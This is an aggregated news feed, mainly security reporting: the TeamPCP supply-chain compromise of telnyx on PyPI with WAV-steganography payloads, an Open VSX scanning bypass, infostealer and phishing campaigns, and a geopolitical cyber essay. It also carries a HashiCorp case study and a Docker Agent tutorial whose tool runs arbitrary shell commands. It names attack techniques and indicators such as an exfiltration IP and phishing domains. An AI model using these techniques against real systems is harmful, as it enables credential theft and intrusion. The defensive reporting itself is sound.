Cloudy Journey

Friday, March 27, 2026

TeamPCP Pushes Malicious Telnyx Versions to PyPI, Hides Stealer in WAV Files

TeamPCP, the threat actor behind the supply chain attack targeting Trivy, KICS, and litellm, has now compromised the telnyx Python package by pushing two malicious versions to steal sensitive data.

The two versions, 4.87.1 and 4.87.2, published to the Python Package Index (PyPI) repository on March 27, 2026, concealed their credential harvesting capabilities within a .WAV file. Users are recommended to downgrade to version 4.87.0 immediately. The PyPI project is currently quarantined.

Various reports from Aikido, Endor Labs, Ossprey Security, SafeDep, Socket, and StepSecurity indicate the malicious code is injected into "telnyx/_client.py," causing it to be invoked when the package is imported into a Python application. The malware is designed to target Windows, Linux, and macOS systems.

"Our analysis reveals a three-stage runtime attack chain on Linux/macOS consisting of delivery via audio steganography, in-memory execution of a data harvester, and encrypted exfiltration," Socket said. "The entire chain is designed to operate within a self-destructing temporary directory and leave near-zero forensic artifacts on the host."

On Windows, the malware downloads a file named "hangup.wav" from a command-and-control (C2) server and extracts from the audio data an executable that's then dropped into the Startup folder as "msbuild.exe." This allows it to persist across system reboots and automatically run every time a user logs in to the system.

In case the compromised host runs on Linux or macOS, it fetches a different .WAV file ("ringtone.wav") from the same server to extract a third-stage collector script and run. The credential harvester is designed to capture a wide range of sensitive data and exfiltrate the data in the form of "tpcp.tar.gz" via an HTTP POST request to "83.142.209[.]203:8080."

"The standout technique in this sample - and the reason for the post title - is the use of audio steganography to deliver the final payload," Ossprey Security said. "Rather than hosting a raw executable or a base64 blob on the C2 (both of which are trivially flagged by network inspection and EDR), the attacker wraps the payload inside a .WAV file."

It's currently not known how the package's PYPI_TOKEN was obtained by TeamPCP, but it's likely that it was through a prior credential harvesting operation.

"We believe the most likely vector is the litellm compromise itself," Endor Labs researchers Kiran Raj and Rachana Misal said. "TeamPCP's harvester swept environment variables, .env files, and shell histories from every system that imported litellm. If any developer or CI pipeline had both litellm installed and access to the telnyx PyPI token, that token was already in TeamPCP's hands."

What's notable about the attack is the absence of a persistence mechanism in Linux and macOS and the use of a temporary directory to conduct the malicious actions and recursively delete all its contents once everything is complete.

"The strategic split is clear. Windows gets persistence: a binary in the Startup folder that survives reboots, providing the threat actor with long-term, repeatable access," Socket explained. "Linux/macOS gets smash-and-grab: a single, high-speed data harvesting operation that collects everything of value and exfiltrates it immediately, then vanishes."

The development comes a few days after the threat actor distributed trojanized versions of the popular litellm Python package to exfiltrate cloud credentials, CI/CD secrets, and keys to a domain under its control.

The supply chain incident also reflects a new-found maturation, where the threat actor has consistently infected legitimate, trusted packages with massive user bases to distribute malware to downstream users and widen blast radius, rather than directly publishing malicious typosquats to open-source package repositories.

"The target selection across this campaign focuses on tools with elevated access to automated pipelines: a container scanner (Trivy), an infrastructure scanning tool (KICS), and an AI model routing library (litellm)," Snyk said. "Each of these tools requires broad read access to the systems it operates on (credentials, configs, environment variables) by design."

To mitigate the threat, developers are advised to perform the following actions -

Audit Python environments and requirements.txt files for telnyx==4.87.1 or telnyx==4.87.2. If found, replace them with a clean version.
Assume compromise and rotate all secrets.
Look for a file named "msbuild.exe" in the Windows Startup folder.
Block the C2 and exfiltration domain ("83.142.209[.]203").

The compromise is part of a broader, ongoing campaign undertaken by TeamPCP spanning multiple ecosystems, with the threat actor announcing collaborations with other cybercriminal groups like LAPSUS$ and an emerging ransomware group called Vect to conduct extortion and ransomware operations.

This also signals a shift where ransomware gangs, which have historically focused on initial access methods like phishing and exploitation of security flaws, are now weaponizing supply chain attacks targeting the open source infrastructure as an entry point for follow-on attacks.

"This puts a spotlight on anything in CI/CD environments that isn’t locked down," Socket said. "Security scanners, IDE extensions, build tooling, and execution environments are granted broad access because they’re expected to need it. When attackers are targeting the tools themselves, anything running in the pipeline has to be treated as a potential entry point."

from The Hacker News https://ift.tt/LBWlVR5
via IFTTT

LAB3 accelerates cloud modernization with HashiCorp-powered unified workflows

What usually begins as an effort to escape slow, ticket-driven cloud operations often becomes something much more transformative. For enterprises working with LAB³, modernizing provisioning and security quickly evolves into establishing a unified workflow across infrastructure, secrets, and networking — a foundation that enables true cloud velocity and unlocks new possibilities for AI and next-generation architectures.

This blog breaks down LAB³’s modernization philosophy, based on real-world insights from Lachlan White, Chief Technology Officer at LAB³ and long-time HashiCorp Ambassador turned IBM Champion.

Challenge: Cloud adoption stalled by manual processes

Many enterprises assume they’ve modernized simply because their workloads now run in the cloud. But when LAB³ begins assessing their environments, a different reality emerges: Provisioning still runs through manual, ticket-driven workflows, secrets are rotated by hand, and networking changes require slow, error-prone coordination across teams.

According to White, this creates an illusion of progress rather than true cloud transformation:

“Taking six weeks to build a server was good. Now they’re in cloud, it takes three weeks — but we know it can take three minutes.” — Lachlan White, CTO, LAB³

The root problem isn’t cloud adoption, but the lack of shared patterns and foundational standards. Without consistent IaC practices, each team builds infrastructure differently, driving drift, inconsistent security, and bottlenecks across hybrid and multi-cloud environments. When AI enters the picture, these problems escalate further.

Key limitations LAB³ sees most often:

Manual provisioning and ticket queues slowing delivery
Secrets stored or rotated manually, often inconsistently
Fragmented networking practices across clouds
No shared IaC patterns, causing drift and duplicated work
Risk-averse processes that limit autonomy and innovation

Crawl: Establishing foundations

In the crawl stage, LAB³ focuses on rebuilding the basics: Shared architectural patterns, consistent IBM Terraform on the HashiCorp Cloud Platform usage, and reliable secrets management. In this phase, the team focuses on stabilizing the environment, reducing risk, and ensuring teams have a strong foundation before automation is scaled.

Walk: Standardization as the catalyst for velocity

Reaching the walk stage marks a turning point. LAB³ helps teams shift from ad hoc, inconsistent builds to a unified, scalable operating model:

IBM Terraform introduces reusable, well-architected modules
IBM Vault embeds proper rotation and access controls into workflows
IBM Consul aligns networking practices across distributed environments

As White notes, this stage is about efficiency, not for its own sake, but to accelerate time-to-market:

“The walk phase is about making it efficient rather than just doing it because we’ve been told it’s a good practice.” — Lachlan White, CTO, LAB³

Run: Platforms ready for innovation at scale

By the run stage, organizations operate like modern engineering teams. LAB³ introduces platform engineering practices, FinOps feedback loops, and advanced Vault and Consul capabilities. This unlocks new space for innovation, from AI frameworks to event-driven architectures. Or as White puts it, LAB³ helps teams explore “the art of the possible.”

One cloud experience, everywhere

LAB³’s transformational model is powered by the HashiCorp ecosystem, enabling enterprises to orchestrate infrastructure, security, and connectivity through one consistent workflow across every cloud and every stage of their modernization journey.

Terraform: Standardized infrastructure delivery

Terraform replaces fragmented, manually built environments with reusable, standardized modules that scale across teams and clouds. By adopting architectural blueprints and well-architected modules, organizations typically see provisioning speed improve by around 70%, reducing delivery from weeks to minutes.

This level of automation and consistency ensures infrastructure is governed, repeatable, and ready to support AI-driven workloads.

Vault: Secure, automated secrets management

Vault centralizes secrets and automates rotation, eliminating the risks associated with manual handling. As teams grow and workloads diversify, Vault provides least-privilege access and the auditability required for compliance.

Consul: Reliable, consistent service connectivity

Consul brings structure to distributed networking — service discovery, routing, and Terraform Sync — ensuring that applications communicate predictably in hybrid and multi-cloud environments.

“The amalgamation of all HashiCorp products enables us to get a unified workflow. We're able to give the developers and the engineers a single unified tool set and experience to extract the value of all of the abstraction we're putting into the platform.” — Lachlan White, CTO, LAB³

Together, these tools form a unified cloud operating model that spans infrastructure, security, and networking, reducing operational overhead by 30-50%.

A cloud platform you can bank on

Nowhere was this transformation more visible than at a major Australian bank. With hundreds of engineering teams working independently, cloud adoption outpaced consistency, and operational overhead grew as AI workloads arrived.

LAB³ responded by rebuilding the foundations:

Terraform to unify provisioning and enforce RBAC
IaC baselines to eliminate one-off templates and drift
Vault to centralize secrets and automate rotation
A curated AI environment for safe, rapid experimentation

White describes the moment the team reset the foundation:

“We weren’t provisioning any of the infrastructure through IaC, so we went back to square one — put everything into HCP Terraform with proper RBAC, then brought in Vault so we weren’t exposing things we didn’t want to.” — Lachlan White, CTO, LAB³

With these systems in place, the bank gained a secure, standardized platform that now powers its emerging AI workloads and is being expanded across its broader ecosystem.

Results:

Provisioning drops from weeks to minutes with standardized Terraform automation
Secrets are governed and automated via Vault
Networking becomes consistent and predictable with Consul
Delivery accelerates with pre-approved templates and guardrails
Operational overhead shrinks as manual processes are removed

Gearing up for the next wave of intelligent systems

Looking ahead, LAB³ is preparing clients for the next generation of cloud-native innovation — from AI and agentic systems to microservices, event-driven architectures, and beyond.

White sees this shift clearly: “AI dramatically increases the speed of change and the surface area of access across modern platforms. As agents, pipelines, and services are introduced at pace, non-human identity becomes the dominant security challenge. Vault enables workload-based authentication and short-lived credentials, giving teams the freedom to adopt new tools quickly without relying on long-lived shared secrets.”

In order to benefit from these emerging technologies, though, White emphasizes that enterprises need to invest in strong foundations today:

“You want to look at these capabilities because they provide the foundational layer for your enterprise's technology stack to address the value of new trends in markets such as artificial intelligence,” he says and then adds, “we can apply some of the security and automation lessons, and even look to add AI to those foundational elements to increase the velocity at which we can develop.”

LAB³ plans to extend AI into the platform itself by:

Automating Terraform module creation and config validation
Enhancing security through AI-driven anomaly detection
Improving developer experience with intelligent IDE guardrails
Enabling agent-based architectures requiring dynamic trust and ephemeral environments

What’s more, they’ve now incorporated agentic AI to further increase productivity gains with the Terraform MCP Server as they enable an agentic workforce to amplify the benefits of their deep technical expertise at scale.

The HashiCorp ecosystem remains critical to these ambitions, ensuring that the underlying platform is stable, secure, and adaptable enough to support whatever comes next.

You can read the full story on our Case study library (no registration):

from HashiCorp Blog https://ift.tt/5QCIfHX
via IFTTT

Open VSX Bug Let Malicious VS Code Extensions Bypass Pre-Publish Security Checks

Cybersecurity researchers have disclosed details of a now-patched bug impacting Open VSX's pre-publish scanning pipeline to cause the tool to allow a malicious Microsoft Visual Studio Code (VS Code) extension to pass the vetting process and go live in the registry.

"The pipeline had a single boolean return value that meant both 'no scanners are configured' and 'all scanners failed to run,'" Koi Security researcher Oran Simhony said in a report shared with The Hacker News. "The caller couldn't tell the difference. So when scanners failed under load, Open VSX treated it as 'nothing to scan for' and waved the extension right through."

Early last month, the Eclipse Foundation, which maintains Open VSX, announced plans to enforce pre-publish security checks before VS Code extensions are published to the repository in an attempt to tackle the growing problem of malicious extensions.

With Open VSX also serving as the extension marketplace for Cursor, Windsurf, and other VS Code forks, the move was seen as a proactive approach to prevent rogue extensions from getting published in the first place. As part of pre-publish scanning, extensions that fail the process are quarantined for admin review.

The vulnerability discovered by Koi, codenamed Open Sesame, has to do with how this Java-based service reports the scan results. Specifically, it's rooted in the fact that it misinterprets scanner job failures as no scanners are configured, causing an extension to be marked as passes, and then immediately activated and made available for download from Open VSX.

At the same time, it can also refer to a scenario where the scanners exist, and the scanner jobs have failed and cannot be enqueued because the database connection pool is exhausted. Even more troublingly, a recovery service designed to retry failed scans suffered from the same problem, thereby allowing extensions to skip the entire scanning process under certain conditions.

An attacker can take advantage of this weakness to flood the publish endpoint with several malicious .VSIX extensions, causing the concurrent load to exhaust the database connection pool. This, in turn, leads to a scenario where scan jobs fail to enqueue.

What's notable about the attack is that it does not require any special privileges. A malicious actor with a free publisher account could have reliably triggered this vulnerability to undermine the scanning process and get their extension published. The issue was addressed in Open VSX version 0.32.0 last month following responsible disclosure on February 8, 2026.

"Pre-publish scanning is an important layer, but it's one layer," Koi said. "The pipeline's design is sound, but a single boolean that couldn't distinguish between 'nothing to do' and 'something went wrong' turned the entire infrastructure into a gate that opened under pressure."

"This is a common anti-pattern: fail-open error handling hiding behind a code path designed for a legitimate 'nothing to do' case. If you're building similar pipelines, make failure states explicit. Never let 'no work needed' and 'work failed' share a return value."

from The Hacker News https://ift.tt/bYWOLQp
via IFTTT

Building a News Roundup with Docker Agent, Docker Model Runner, and Skill

Hello, I’m Philippe, and I am a Principal Solutions Architect helping customers with their usage of Docker. I wanted a lightweight way to automate my IT news roundups without burning through AI credits. So I built a Docker Agent skill that uses the Brave Search API to fetch recent articles on a topic, then hands the results to a local model running with Docker Model Runner to analyze the stories and generate a Markdown report.

In this setup, Qwen3.5-4B handles the reasoning and skill invocation, while the skill itself does the retrieval work. The result is a simple local workflow for turning a prompt like “use news roundup skill with tiny language models” into a structured news brief I can save, review, and reuse.

It is a bit slower than doing the same thing with Claude Code, but that tradeoff works for me: I keep the workflow local, I save my Claude credits, and I get a practical example of how skills make Docker Agent more useful for repeatable tasks.

Prerequisites for building the news roundup:

Docker and Docker Compose, obviously.
A Brave Search account with an API key (you can get one here). (There’s a free plan.)
A local model that supports a large context window and knows how to do function calling.

I chose to use qwen3.5-4b from Qwen (I went with the Unsloth version), a 4-billion-parameter model optimized for text understanding and generation, with native support for up to 262144 context tokens.

I started my tests with qwen3.5-9b, but on my MacBook Air, it’s a bit slow and qwen3.5-4b does the job just fine.

Let’s get into the setup.

Step-by-step guide to building the news roundup

Step 1: Creating the Dockerfile

I used an ubuntu:22.04 base image and installed curl to make requests to the Brave Search API. I also copied the docker-agent binary from the docker/docker-agent:1.32.5 image to run the agents.

FROM --platform=$BUILDPLATFORM docker/docker-agent:1.32.5 AS coding-agent

FROM --platform=$BUILDPLATFORM ubuntu:22.04 AS base

LABEL maintainer="@k33g_org"
ARG TARGETOS
ARG TARGETARCH

ARG USER_NAME=docker-agent-user

ARG DEBIAN_FRONTEND=noninteractive

ENV LANG=en_US.UTF-8
ENV LANGUAGE=en_US.UTF-8
ENV LC_COLLATE=C
ENV LC_CTYPE=en_US.UTF-8

# ------------------------------------
# Install Tools
#------------------------------------
RUN &lt;&lt;EOF
apt-get update
apt-get install -y wget curl
apt-get clean autoclean
apt-get autoremove --yes
rm -rf /var/lib/{apt,dpkg,cache,log}/
EOF

# ------------------------------------
# Install docker-agent
# ------------------------------------
COPY --from=coding-agent /docker-agent /usr/local/bin/docker-agent

# ------------------------------------
# Create a new user
# ------------------------------------
RUN adduser ${USER_NAME}
# Set the working directory
WORKDIR /home/${USER_NAME}
# Set the user as the owner of the working directory
RUN chown -R ${USER_NAME}:${USER_NAME} /home/${USER_NAME}
# Switch to the regular user
USER ${USER_NAME}

Let’s move on to the agent configuration.

Step 2: Creating the Docker Agent configuration file

For the Docker Agent configuration, I defined a root agent using the brain model, which is an alias for qwen3.5-4b. I also enabled skills support (skills: true) and provided detailed instructions so the agent behaves like an expert IT journalist, capable of searching, analyzing, and summarizing the latest tech news.

For the toolsets, Docker Agent ships with some ready-to-use ones, but I preferred a script-type toolset with an execute_command that can run any shell command and capture its output. This gives me the flexibility to interact with the Brave Search API directly from shell commands, without having to implement specific tools for it — and most importantly, it keeps the agent’s instructions lightweight.

agents:
  root:

    model: brain
    description: News Roundup Expert
    skills: true
    instruction: |
      You are an expert IT journalist with deep knowledge of software engineering, cloud infrastructure, artificial intelligence, cybersecurity, and the open-source ecosystem.
      Your role is to gather, analyze, and summarize the latest technology news in a clear, accurate, and engaging way.
      You write for a technical audience and always provide context, highlight trends, and explain the impact of each piece of news.

    toolsets:
      - type: script
        shell:

          execute_command:
            description: Execute a shell command and return its stdout and stderr output.
            args:
              command:
                description: The shell command to execute.
            cmd: |
              bash -c "$command" 2>&amp;1

models:

  brain:
    provider: dmr
    model: huggingface.co/unsloth/qwen3.5-4b-gguf:Q4_K_M
    temperature: 0.0
    top_p: 0.95
    presence_penalty: 1.5
    provider_opts:
      # llama.cpp flags
      runtime_flags: ["--context_size=65536"]

Now let’s look at the skill.

Step 3: Building the news roundup skill

I created a news-roundup skill that uses the Brave Search API to search for the latest news on a given topic, enriches each article with additional web searches, and generates a structured Markdown report.

Inside the .agents/skills folder, I created a news-roundup directory with a SKILL.md file that describes the skill in detail, with the steps to follow and the commands to execute at each step.

├── .agents
│   └── skills
│       └── news-roundup
│           └── SKILL.md

Here’s the content of SKILL.md:

---
name: news-roundup
description: search the news using Brave News Search API with a query as argument. Use this skill when the user asks to search for recent news or current events.
---
# News Roundup

## Purpose

Generate a comprehensive Markdown news report on a given topic (default: "small ai local models").

## Steps to follow

### Step 1 — Search for recent news

#### Command to execute

```bash
curl -s "https://api.search.brave.com/res/v1/news/search?q=$(echo "$ARGUMENTS_REST" | sed 's/ /+/g')&amp;count=3&amp;freshness=pw" \
  -H "X-Subscription-Token: ${BRAVE}" \
  -H "Accept: application/json"
```

### Step 2 — Enrich each article

For each article returned in Step 1, use the below command with the article URL to retrieve additional context and details.

#### Command to execute

```bash
curl -s "https://api.search.brave.com/res/v1/web/search?q=$(echo "$ARTICLE_URL" | sed 's/ /+/g')&amp;count=10" \
  -H "X-Subscription-Token: ${BRAVE}" \
  -H "Accept: application/json"
```

### Step 3 — Generate the Markdown report

Using all the collected information, write a well-structured Markdown report saved to `/workspace/news-report.md`.

The report must follow this structure:

```markdown
# IT News Report — {topic}

> Generated on {date}

## Summary

A short paragraph summarizing the main trends found across all articles.

## Articles

### {Article Title}

- **Source**: {source name}
- **URL**: {url}
- **Published**: {date}

{2-3 sentence summary of the article content and its significance for IT professionals}

---

(repeat for each article)

## Key Trends

A bullet list of the main technology trends identified across all articles.
```

Save the final report to `/workspace/data/news-report-{YYYYMMDD-HHMMSS}.md` using the `write_file` tool, where `{YYYYMMDD-HHMMSS}` is the current date and time (e.g. `news-report-20260318-143012.md`).
To get the current timestamp, run:

```bash
date +"%Y%m%d-%H%M%S"
```

All that’s left is to create the compose.yml file to launch the agent.

Step 4: Updating the compose.yml file

Here’s the content of compose.yml.

Note: you’ll need a .env file with your Brave Search API key (e.g. BRAVE=abcdef1234567890).

services:
  news-roundup:
    build:
      context: .
      dockerfile: Dockerfile
    stdin_open: true
    tty: true
    command: docker-agent run /workspace/config.yaml
    volumes:
      - ./config.yaml:/workspace/config.yaml:ro
      - ./.agents:/workspace/.agents:ro
      - ./data:/workspace/data
    working_dir: /workspace

    env_file:
      - .env

    models:
      qwen3.5-4b:

models:

  qwen3.5-4b:
    model: huggingface.co/unsloth/qwen3.5-4b-gguf:Q4_K_M
    context_size: 65536

And that’s it — everything we need to run our IT news roundup agent.

Step 5: Let’s test it out!

Just run the following command in your terminal:

docker compose run --rm --build news-roundup

And ask the agent:

use news roundup skill with tiny language models

The agent will then execute the news-roundup skill, query the Brave Search API, analyze the articles, and generate a Markdown report in the data folder.

Note: this can take a little while, so feel free to grab a coffee (or get some work done).

The agent will detect that it needs to run tools (the curl commands from the news-roundup skill) — you can validate each command manually or let the agent run them automatically:

Your agent will work for a few minutes…

…and at the end, it will give you the path of the generated report, which you can open to read your personalized IT news roundup:

You can find examples of generated reports in the data folder of the project on this repository: https://codeberg.org/docker-agents/news-roundup/src/branch/main/data.

Final Thoughts

That’s the full setup: a Docker Agent skill for news retrieval, the Brave Search API for fresh articles, and Docker Model Runner with Qwen3.5-4B for local analysis and report generation.

You now have a fully local IT news roundup agent. I have written a lot of content on use cases for local models, including context packaging and making small LLMs smarter. See you soon for more Docker Agent use cases with local language models!

from Docker https://ift.tt/lGBODQj
via IFTTT

The Good, the Bad and the Ugly in Cybersecurity – Week 13

The Good | U.S. Jails Ransomware Actors, Extradites Alleged RedLine Operator

The DoJ has given Russian national, Aleksey Volkov, almost seven years in person and ordered him to pay full restitution for acting as an initial access broker in Yanluowang ransomware attacks. Between 2021 and 2022, he breached multiple U.S. organizations and sold network access to affiliates who deployed ransomware and demanded payments up to $15 million. Arrested in Italy in 2024 and later extradited, Volkov pleaded guilty in 2025. Investigators have since tied him to over $9 million in losses using digital evidence, including chat logs and iCloud data.

For Ilya Angelov, a fellow Russian citizen, U.S. courts have doled out two years in prison for co-managing a phishing botnet used to enable BitPaymer ransomware attacks against 72 major companies across the States. From 2017 to 2021, the crime group known as TA551 distributed malware via massive spam campaigns, infecting thousands of systems daily and selling access to other cybercriminals. These operations generated over $14 million in ransom payments. Angelov later traveled to the U.S. to plead guilty following the Russian invasion of Ukraine in 2022 and has been fined $100,000 on top of his sentence.

Law enforcement have also extradited Hambardzum Minasyan to the United States to face charges for allegedly helping to operate the RedLine infostealer malware service. According to the prosecution, the Armenian national managed RedLine’s infrastructure, including servers, domains, and cryptocurrency accounts used to support affiliates and distribute malware as well as laundered the illicit proceeds. The operations enabled large-scale data theft from infected systems, targeting corporations and individuals. He now faces multiple cybercrime charges and could receive up to 30 years in prison if convicted.

The Bad | Hackers Deploy FAUX#ELEVATE Malware via Phishing Resumes

Cyberattackers have set their sights on French-speaking professionals, luring victims with fake résumé attachments in an active phishing campaign designed to deploy credential stealers and cryptocurrency miners. The activity, now tracked as FAUX#ELEVATE, relies on heavily obfuscated VBScript files disguised as CV documents, which execute silently while displaying fake error messages. The malware uses sandbox evasion, persistence techniques, and a domain-check mechanism to ensure only enterprise systems are infected.

Once the attackers gain elevated privileges, the attack then disables security defenses, modifies system settings, and downloads additional payloads from legitimate platforms and infrastructure like Dropbox, Moroccan WordPress sites, and mail[.]ru. This abuse of valid services allows the attackers to stage the payloads, host a command and control (C2) configuration, and exfiltrate browser credentials and desktop files.

The campaign stands out for its “living-off-the-land” approach, which is defined by blending malicious activity with trusted services to evade detection. It also uses advanced techniques to bypass browser encryption and maximize system resource exploitation. After execution, most artifacts are removed to limit forensic visibility, leaving only persistent mining and backdoor components.

Notably, the entire infection chain executes in under 30 seconds, enabling rapid compromise and data theft. By selectively targeting domain-joined systems, attackers ensure high-value corporate credentials are harvested, making the campaign particularly dangerous for enterprise environments.

Campaigns like FAUX#ELEVATE show that even heavily obfuscated malware still presents multiple choke points for detection, from malicious scripting chains and abuse of legitimate services to anomalous outbound traffic. A modern, capable EDR with strong behavioral detection and endpoint visibility can detect and stop activity like this despite the obfuscation.

The Ugly | TeamPCP Hijacks Trivy, npm, and LiteLLM to Steal Credentials Worldwide

Over the past week, a cloud-focused threat actor called TeamPCP orchestrated a multi-stage, global supply chain campaign, beginning with a compromise of the widely-used Trivy vulnerability scanner. By injecting malicious code into Trivy v0.69.4 and associated GitHub Actions, TeamPCP harvested credentials, SSH keys, cloud tokens, CI/CD secrets, and cryptocurrency wallets. The malware persisted via systemd services and exfiltrated stolen data to typosquatted or attacker-controlled domains.

Following the Trivy breach, TeamPCP deployed CanisterWorm, a self-propagating npm malware that leveraged compromised developer tokens to infect additional packages. CanisterWorm used a decentralized ICP canister as a resilient dead-drop C2, enabling automated payload updates and credential theft without direct attacker interaction.

The group then expanded to Aqua Security’s broader GitHub ecosystem, tampering with private repositories and Docker images, and to Checkmarx workflows and VS Code extensions, using the same credential-stealing payload to cascade compromises across CI/CD pipelines. Kubernetes clusters have also been targeted with scripts that wiped machines in Iranian locales while installing persistent backdoors elsewhere, demonstrating both selective destruction and lateral movement.

In the most recent leg of the offensive, TeamPCP compromised the popular “LiteLLM” Python package on PyPI, embedding the same cloud stealer and persistence mechanisms into versions 1.82.7 and 1.82.8. The attack harvested credentials, accessed Kubernetes secrets, and installed persistent systemd services while exfiltrating data to infrastructure controlled by the attackers.

Across this cluster of linked incidents, TeamPCP’s operations highlight the danger of credential reuse, incomplete secret rotation, and weak CI/CD hygiene, pointing to how a single supply chain compromise can cascade into a multi-platform, multi-stage attack that spans open-source software, cloud services, and developer ecosystems.

from SentinelOne https://ift.tt/W3Lt9RU
via IFTTT

AitM Phishing Targets TikTok Business Accounts Using Cloudflare Turnstile Evasion

Threat actors are using adversary-in-the-middle (AitM) phishing pages to seize control of TikTok for Business accounts in a new campaign, according to a report from Push Security.

Business accounts associated with social media platforms are a lucrative target, as they can be weaponized by bad actors for malvertising and distributing malware.

"TikTok has been historically abused to distribute malicious links and social engineering instructions," Push Security said. "This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut."

The campaign begins with tricking victims into clicking on a malicious link that directs them to either a lookalike page impersonating TikTok for Business or a page that's designed to impersonate Google Careers, along with an option to schedule a call to discuss the opportunity.

It's worth noting that a prior iteration of this credential phishing campaign was flagged by Sublime Security in October 2025, with emails masquerading as outreach messages used as a social engineering tactic.

Regardless of the type of page served, the end goal is the same: perform a Cloudflare Turnstile check to block bots and automated scanners from analyzing the contents of the page and serve a malicious AitM phishing page login page that's designed to steal their credentials.

The phishing pages are hosted on the following domains -

welcome.careerscrews[.]com
welcome.careerstaffer[.]com
welcome.careersworkflow[.]com
welcome.careerstransform[.]com
welcome.careersupskill[.]com
welcome.careerssuccess[.]com
welcome.careersstaffgrid[.]com
welcome.careersprogress[.]com
welcome.careersgrower[.]com
welcome.careersengage[.]com
welcome.careerscrews[.]com

The development comes as another phishing campaign has been observed using Scalable Vector Graphics (SVG) file attachments to deliver malware to targets located in Venezuela.

According to a report published by WatchGuard, the messages have SVG files with file names in Spanish, masquerading as invoices, receipts, or budgets.

"When these malicious SVGs are opened, they communicate with a URL that downloads the malicious artifact," the company said. "This campaign uses ja.cat to shorten URLs from legitimate domains that have a vulnerability that allows redirects to any URL, so they point to the original domain where the malware is downloaded."

The downloaded artifact is a malware written in Go that shares overlaps with a BianLian ransomware sample detailed by SecurityScorecard in January 2024.

"This campaign is a strong reminder that even seemingly harmless file types like SVGs can be used to deliver serious threats," WatchGuard said. "In this case, malicious SVG attachments were used to initiate a phishing chain that led to malware delivery associated with BianLian activity."

from The Hacker News https://ift.tt/fIqk3zH
via IFTTT

We Are At War

Rising geopolitical tensions are reflected (or in some cases preceded) by cyber operations, while technology itself has become politicized. Let’s admit it: we are in the middle of it.

Introduction: One tech power to rule them all is a thing of the past

The relative safety, peace and prosperity that much of the world has enjoyed since 1945 was not accidental. It emerged from the ashes of two world wars and the deliberate construction of a new global order. The United States of America set the terms of this new world.

The long peace under Pax Americana provided a stable foundation, but that foundation is shifting. Europe’s deep strategic dependence on the U.S.’s technological and cybersecurity capabilities, from intelligence and infrastructure to frameworks and funding, is now being tested. Those tectonic geopolitical changes are undermining trust, threatening the state of safety, and compelling European organizations to rethink digital architectures and approaches at every level.

All technology is considered political and is involved as a weapon, a target, or a lever in geopolitical conflict. As a political entity increases its reliance on technology platforms, it increases its exposure to technical power projection, enabling cyber and psychological operations, misinformation campaigns, and other forms of power projection.

Welcome to the jungle (again)

The contemporary threat landscape is not a simple product of the whims or choices of criminal hackers and other threat actors. Instead, there is a diversity of actors - both benign and malicious - that have an influence. Those actors operate within a context that is, in turn, defined by the complex interactions between yet another set of systemic forces.

To understand the threat landscape, we must therefore consider all the systemic factors that shape it, as well as the actors that operate within it.

In our research efforts, we keep assessing how political, economic, social, and technological factors influence operations and risks.

State Actors and Critical Infrastructure

Night Dragon (mid-2000s onward): A China-linked campaign against energy and defense firms globally illustrated the move from opportunistic hacking to long-dwell, state-sponsored industrial espionage ^[1].
Volt Typhoon Botnet Disruption (Jan 2024): The U.S. government announced a court-authorized operation to dismantle a botnet of compromised routers used by the Chinese state-sponsored group Volt Typhoon in pre-positioning within U.S. critical infrastructure ^[2].
Salt Typhoon Telecom Breaches (Oct 2024): A global compromise of major telecom networks, attributed to the Chinese-linked group Salt Typhoon, exposed how state actors could access the communications of government officials and a multitude of civilians ^[3].
U.S. Advisory on Critical Infrastructure Targeting (Feb 2024): The U.S. and allied agencies issue a joint advisory declaring that Volt Typhoon had compromised IT networks across communications, energy, transport, and water sectors, marking a milestone in recognizing state cyber power as a strategic threat ^[4].

State-linked cyber operations have remained active with a primary focus on intelligence collection and occasional disruptive actions used for signaling, amid a backdrop of information operations that vary widely in scale and intensity ^[5].

Attack methods are concentrating on identity and the edge ^[6]. Recent reporting also describes stealthy backdoors placed on appliances and virtualization platforms to maintain access for many months without noisy malware ^[7]. In parallel, rapid exploitation of 0-day and n-day vulnerabilities in perimeter appliances remains common, and supplier and service-provider pathways continue to feature prominently in incident trends ^[8].

Security Navigator 2026 is Here - Download Now

The newly released Security Navigator 2026 offers critical insights into current digital threats, documenting 139,373 incidents and 19,053 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

What's Inside?

📈 In-Depth Analysis: Statistics from CyberSOC, Vulnerabilitiy scanning, Pentesting, CERT, Cy-X and Ransomware observations from Dark Net surveillance.
🔮 Future-Ready: Equip yourself with security predictions and stories from the field.
🧠 Stories from security practitioners across the world.
👁️ Security deep-dives: Get briefed on emerging trends related to Generative AI, Operational Technology and post-quantum cryptography.

Stay one step ahead in cybersecurity. Your essential guide awaits!

🔗 Get Your Copy Now

Targeting remains concentrated on government and telecommunications, with repeated activity against defense-linked networks ^[9]. High-tech sectors, notably semiconductors, also saw focused campaigns in 2025 ^[10]. The seam between enterprise IT and OT in industrial environments remains a concern, with pivots into plant and field systems where monitoring is limited and safety constraints slow response. Open reporting also indicates continued use of commercial spyware by government clients, with fresh forensic cases against journalists in 2025 ^[11].

This state-linked picture is only part of the landscape. Non-state actors, as well as criminals and hacktivists, increasingly operate alongside or in the wake of state campaigns.

Hacktivists: From Cyberspace Vigilantes To State-Aligned Bullies

7 April 2025: Attackers seized control of the Bremanger dam in Norway, opened floodgates, and released 500 litres of water per second for four hours. Later attributed to Russian hackers by Norway’s security service ^[12].
7 May 2025: The National Cyber Security Center (UK) reports that the pro-Russian hacktivist group NoName057(16) had claimed a three-day DDoS campaign against several UK public sector websites ^[13].
17 June 2025: Predatory Sparrow claims to have destroyed data at the Iranian state-owned Bank Sepah, causing outages for customers ^[14]
16 July 2025: Europol announces that the global “Operation Eastwood” disrupted the infrastructure of NoName057(16), marking a coordinated law-enforcement action against a hacktivist network ^[15].
14 August 2025: Norway’s intelligence service publicly attributes the dam intrusion and rising threat of pro-Russian cyber actors to the event. ^[16]
29 October 2025: The Canadian Center for Cyber Security alerts that hacktivist groups had breached water, energy, and agricultural OT/ICS systems in Canada, manipulating water pressure, temperature, and humidity levels ^[17].

As we’ve previously reported ^[18], hacktivism has entered its “establishment” era. Once a form of digital protest directed against institutions of power, it has evolved into a complex ecosystem of state-aligned and ideologically driven actors that often serve as informal extensions of geopolitical influence. The term “hacktivism” itself today conceals more than it reveals. It no longer refers simply to fringe collectives with political messages, but to distributed, collaborative movements capable of real-world disruption and widespread cognitive manipulation.

